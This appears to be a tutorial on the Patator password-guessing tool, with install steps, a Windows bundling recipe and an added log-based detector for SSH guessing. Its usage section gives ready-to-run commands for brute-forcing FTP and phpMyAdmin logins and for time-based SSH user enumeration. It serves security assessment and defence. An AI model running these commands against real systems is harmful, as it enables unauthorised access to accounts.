Understanding Patator: A Powerful Password Guessing Tool

Patator was developed out of frustration with existing tools like Hydra, Medusa, and Ncrack, which often fall short in reliability and flexibility. Aiming to provide a fresh approach, Patator is a multi-threaded tool written in Python designed for conducting password guessing attacks effectively.

Supported Modules

Patator supports a wide range of modules for different protocols, including:

  • ftp_login: Brute-force FTP
  • ssh_login: Brute-force SSH
  • telnet_login: Brute-force Telnet
  • smtp_login: Brute-force SMTP
  • smtp_vrfy: Enumerate valid users using SMTP VRFY
  • smtp_rcpt: Enumerate valid users using SMTP RCPT TO
  • finger_lookup: Enumerate valid users using Finger
  • http_fuzz: Brute-force HTTP/HTTPS
  • rdp_gateway: Brute-force RDP Gateway
  • ajp_fuzz: Brute-force AJP
  • pop_login: Brute-force POP
  • imap_login: Brute-force IMAP
  • ldap_login: Brute-force LDAP
  • ...and many more.

The name "Patator" is inspired by a humorous video reference, making it a memorable choice for this tool.

Installation

To install Patator, follow these steps:

git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt

Usage Examples

Patator can be used across various platforms with numerous scenarios. Here are some examples:

  • FTP: Identifying users denied login in vsftpd/userlist.
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500

Tested against vsftpd-3.0.2-9 on CentOS 7.0-1406.

  • SSH: Time-based user enumeration.
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3

Tested against openssh-server 1:6.0p1-4+deb7u2 on Debian 7.8.

  • HTTP: Brute-force phpMyAdmin logon.
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Tested against phpMyAdmin 4.2.7.1.
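
On the defending side, runs like the FTP and SSH examples above walk a username list against one host from a single source, so the auth log shows many distinct account names failing from one IP within a short window. The following is an added example, not part of Patator or the original page, that flags this pattern in sshd log lines; the log lines are constructed, and the function name, thresholds and year default are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd lines (OpenSSH syslog format); not real log data.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 40112 ssh2
Mar  3 10:00:02 host sshd[1202]: Failed password for invalid user oracle from 192.0.2.10 port 40113 ssh2
Mar  3 10:00:03 host sshd[1203]: Failed password for root from 192.0.2.10 port 40114 ssh2
Mar  3 10:00:04 host sshd[1204]: Failed password for invalid user test from 192.0.2.10 port 40115 ssh2
Mar  3 10:00:05 host sshd[1205]: Failed password for invalid user backup from 192.0.2.10 port 40116 ssh2
Mar  3 10:02:00 host sshd[1300]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Mar  3 10:09:30 host sshd[1301]: Failed password for alice from 198.51.100.7 port 51001 ssh2
Mar  3 10:10:00 host sshd[1302]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def find_guessing_sources(log_text, min_users=4,
                          window=timedelta(seconds=60), year=2024):
    """Return {ip: sorted usernames} for sources that failed logins for at
    least `min_users` distinct accounts inside one sliding `window`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            # syslog timestamps omit the year; the caller supplies it (assumption)
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events[m["ip"]].append((ts, m["user"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # shrink the window from the left until it spans <= `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if len({u for _, u in evs[start:end + 1]}) >= min_users:
                flagged[ip] = sorted({u for _, u in evs})
                break
    return flagged

if __name__ == "__main__":
    for ip, users in find_guessing_sources(SAMPLE_LOG).items():
        print(f"{ip}: {len(users)} distinct accounts tried: {', '.join(users)}")
```

Counting distinct usernames rather than raw failures keeps a single user who mistypes a password a few times (198.51.100.7 in the sample) out of the results.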

PyInstaller Bundling

Bundling Patator on Windows using PyInstaller involves several straightforward steps, beginning with installing Python and dependencies:

pip install pycrypto pyopenssl
pip install paramiko
pip install pysnmp

After preparing the environment, clone Patator and run PyInstaller:

cd c:\
git clone https://github.com/lanjelot/patator
git clone https://github.com/pyinstaller/pyinstaller
cd pyinstaller
python pyinstaller.py --clean --onefile c:\patator\patator.py

Conclusion

Patator is a versatile and efficient tool for password guessing attacks, boasting a variety of supported modules and ease of use. It is essential that users familiarize themselves with its capabilities and best practices to maximize its potential. By understanding how to use Patator effectively, users can conduct necessary security assessments and improve the security posture of their systems.

